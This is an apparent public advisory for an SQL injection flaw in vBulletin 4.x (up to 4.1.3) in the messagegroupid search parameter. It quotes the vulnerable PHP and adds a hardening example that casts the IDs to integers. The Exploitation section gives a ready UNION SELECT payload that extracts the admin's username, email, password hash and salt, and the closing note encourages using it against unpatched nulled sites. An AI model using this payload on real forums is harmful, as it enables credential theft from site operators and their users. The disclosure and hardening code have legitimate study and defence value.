Vulnerability:
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection vulnerability in the parameter "&messagegroupid" due to improper input validation.
Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Parameter: messagegroupid
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
{
    $value = $registry->GPC['messagegroupid'];
    if (!is_array($value))
    {
        $value = array($value);
    }
    if (!(in_array('', $value) OR in_array('', $value)))
    {
        if ($rst = $vbulletin->db->query_read("
            SELECT socialgroup.name
            FROM " . TABLE_PREFIX . "socialgroup AS socialgroup
--->        WHERE socialgroup.groupid IN (" . implode(',', $value) . ")")
    }
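One way to harden the query above, shown as an added example that is not vBulletin's code or its actual patch: every element of the request array is reduced to an unsigned integer before implode() builds the IN (...) list. The helper names clean_group_ids and build_group_name_query and the vb_ table prefix are assumptions made for illustration.

```php
<?php
// Added example, not vBulletin's code or its official patch.
// Hypothetical helper: reduce a request-supplied ID list to unsigned integers.
function clean_group_ids($raw): array
{
    // Mirror the original behaviour: accept a scalar or an array.
    $values = is_array($raw) ? $raw : array($raw);
    $ids = array();
    foreach ($values as $v) {
        // Keep only non-negative ints or strings made entirely of digits.
        // Anything carrying SQL syntax fails this test and is dropped.
        if (is_int($v) && $v >= 0) {
            $ids[] = $v;
        } elseif (is_string($v) && $v !== '' && ctype_digit($v)) {
            $ids[] = (int) $v;
        }
    }
    return array_values(array_unique($ids));
}

// Hypothetical helper: build the group-name lookup from cleaned IDs only.
function build_group_name_query(string $tablePrefix, $raw): ?string
{
    $ids = clean_group_ids($raw);
    if (count($ids) === 0) {
        return null; // nothing valid to look up, so no query is issued
    }
    // Every element is a PHP int here, so implode() can only emit digits and commas.
    return "SELECT socialgroup.name
        FROM " . $tablePrefix . "socialgroup AS socialgroup
        WHERE socialgroup.groupid IN (" . implode(',', $ids) . ")";
}

// Constructed sample inputs (not taken from a real request).
$samples = array(
    array('3', '7'),                // valid IDs: query is built
    array('3) UNION SELECT 1 #'),   // injection-shaped value: rejected, null
    '12',                           // scalar is wrapped like the original code
    array(array('nested')),         // nested array: rejected, null
);
foreach ($samples as $s) {
    var_dump(build_group_name_query('vb_', $s));
}
```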
Exploitation:
Post data on: --> search.php?search_type=1
--> Search Single Content Type
Keywords: Valid Group Message
Search Type: Group Messages
Search in Group: Valid Group Id
&messagegroupid[0]=3) union select concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
More Details:
http://www.Garage4Hackers.com
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day
Note:
Funny part was that a similar bug was found in the same module, search query, two months back. Anyway, Vbulletin has released a patch as it was reported to them by altex, hence customers are safe except those lousy admins. And this bug is for people to play with the specified nulled VB sites out there. "Say No to Piracy Disclosure".